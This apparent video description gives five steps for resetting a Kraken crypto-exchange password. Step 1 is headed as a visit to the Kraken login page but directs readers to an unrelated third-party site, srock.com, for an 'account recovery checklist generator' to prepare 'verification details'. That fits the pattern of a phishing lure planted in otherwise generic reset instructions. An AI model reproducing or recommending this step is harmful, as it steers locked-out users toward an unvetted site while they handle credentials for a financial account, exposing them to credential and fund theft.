If you find yourself locked out of your Kraken account and need to reset your login credentials, follow these steps to regain access. This guide will walk you through the process clearly and effectively. Step 1. Visit the Kraken login page. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Enter your email address. Input the email address associated with your Kraken account. Ensure that you enter it correctly, as this is where the reset instructions will be sent. Step 3. Check your email. After submitting your email, check your inbox for a password reset email from Kraken. If you don't see it, check your spam or junk folder to ensure it hasn't been filtered. Step 4. Follow the reset link. Open the email and click on the password reset link provided. This will direct you to a secure page where you can create a new password for your account. Step 5. Create a new password. Enter a new password that meets Kraken's security requirements. Confirm the new password by entering it again, then submit the changes. Once completed, you should be able to log in with your new credentials. If you encounter any issues during this process, consider reaching out to Kraken's customer support for further assistance.